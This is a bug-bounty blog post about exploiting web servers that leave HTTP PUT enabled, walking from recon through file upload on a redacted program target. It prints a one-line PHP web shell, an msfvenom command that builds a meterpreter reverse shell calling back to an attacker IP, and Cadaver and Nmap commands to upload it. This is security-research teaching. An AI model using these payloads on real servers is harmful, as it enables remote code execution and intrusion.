> For the complete documentation index, see [llms.txt](https://strik3r.gitbook.io/strik3r-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strik3r.gitbook.io/strik3r-blog/bug-bounty/http-put-method-exploit.md).

# HTTP PUT Method Exploit

![](/files/IWGKzfGlZLjlc94Yzx4U)

Hello Hackers, Hope you are well !!

Today I'll talk about one of the most basic web attacks that recently faced me while doing bug hunting at private program which is exploiting enabled HTTP PUT Method.

## <mark style="color:green;">What is PUT?</mark>

The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

### <mark style="color:green;">Syntax</mark>

```
PUT /new.html HTTP/1.1
```

### <mark style="color:green;">Example</mark>&#x20;

#### Request

```
PUT /new.html HTTP/1.1
Host: example.com
Content-type: text/html
Content-length: 16

<p>New File</p>
```

#### Responses

If the target resource does not have a current representation and the `PUT` request successfully creates one, then the origin server must inform the user agent by sending a [`201`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201) (`Created`) response.

```
HTTP/1.1 201 Created
Content-Location: /new.html
```

If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, then the origin server must send either a [`200`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200) (`OK`) or a [`204`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204) (`No Content`) response to indicate successful completion of the request.

```
HTTP/1.1 204 No Content
Content-Location: /existing.html
```

### <mark style="color:green;">Real Life Scenario</mark>&#x20;

while doing some recon on private program after gathering subdomains i always convert live.txt to IPs to run some port scanning using simple go script [h2i ](https://github.com/cybercdh/h2i)

![](/files/rBp79LQUD6CbGG2FJwIZ)

since this program have a small scope i got some few IPs, in this situation i prefer using Nmap on masscan.

after few minutes i got very interesting result  which was something like this.

![](/files/wWuXMmMtp6s7mnGFg8z0)

without wasting any time i quickly opened metasploit to check if PUT method allowing uploading or creating any files in this subdomain.

### <mark style="color:green;">Exploit using Metasploit</mark>

create some test txt file to try uploading it to web server

![](/files/NyvV4YbcVc1tr5wRhdPP)

by using **`auxiliary/scanner/http/http_put`** module on metasploit we can scan http put method&#x20;

![](/files/A7QHeCdgHS1ZyM4RJ2W3)

after visiting this path on vulnerable domain we can notice that the injection worked fine.

![](/files/kL4wftpG6VVSRVlbSmbb)

![](https://media.giphy.com/media/msKNSs8rmJ5m/giphy.gif)

### <mark style="color:green;">Exploit with Burpsuit</mark>

As we all knows [BurpSuite ](https://portswigger.net/burp)is one of the most popular proxy intercepting tool through which you can easily analyze all kind of GET and POST requests.

&#x20;*Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside* [*BurpSuite* ](https://portswigger.net/burp)*are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.*

by intercepting GET request to <http://redact.redact.redact.target.com> and change it to PUT, we can create files & and add any content to it.

![](/files/tdAZVkjDxM5ccyqW5Baf)

send Get request to this newly created file <http://redact.redact.redact.target.com/strik3rpoc.php> we can see that it\`s also created successfully.

![](/files/HnJlOQXgWhgWRSxgNemg)

⭐ <mark style="color:orange;">**Golden TIP:**</mark> "*always try to escalate*". with that being said, i tried to get Remote Code Execution by creating some malicious php code in this file.

```
<?php system($_GET['cmd']); ?>
```

![](/files/IDwHZD3I2TGPQIThwaDe)

attempt to execute any command with injected parameter `cmd` but got nothing back.

![](/files/Jm3SjIV6GTUwbYscWDF4)

Tried many ways to get commands runs but no luck 😥 the file is always reflecting it\`s content without execute any command.&#x20;

### <mark style="color:green;">Exploit With Cadaver & Metasploit Framework</mark>

i\`ve tried to upload PHP malicious file which we’ll generate with the help of [msfvenom ](https://www.offensive-security.com/metasploit-unleashed/msfvenom/#:~:text=MSFvenom%20is%20a%20combination%20of,Standardized%20command%20line%20options)command.

`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php`

![](/files/kBBFENZeTFZPz4E7sjfM)

Now run Cadaver tool which is already installed in every Kali Linux machine. Cadaver is a command line tool that support uploading and downloading of a files on webdav.

To run Cadaver, the command is:

`cadaver http://target.com/`

If all is good till now we can upload the **shell.php** file which you’ve created with msfvenom.

but i do not know why it did\`t work with me ¯\\\_(ツ)\_/¯

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

Anyways when you face this situation you can upload shell via [metasploit like above step](#exploit-using-metasploit) or you can use Nmap script to upload it with this command:

`nmap -p 80 target.com –-script http-put –-script-args http-put.url='strik3r_nmap.php",http-put.file="/root/shell.php'`

> Thanks For Reading

<table><thead><tr><th align="center">    Follow Me</th><th data-hidden></th><th data-hidden></th></tr></thead><tbody><tr><td align="center"><a href="https://www.facebook.com/StrikerHacker33/"><mark style="color:blue;"><strong>Facebook</strong></mark></a></td><td></td><td></td></tr><tr><td align="center"><a href="https://www.linkedin.com/in/eslam-kamal/"><mark style="color:blue;"><strong>LinkedIn</strong></mark></a></td><td></td><td></td></tr><tr><td align="center"><a href="https://twitter.com/xxEslam_Kamalxx"><mark style="color:blue;"><strong>Twitter</strong></mark></a></td><td></td><td></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://strik3r.gitbook.io/strik3r-blog/bug-bounty/http-put-method-exploit.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.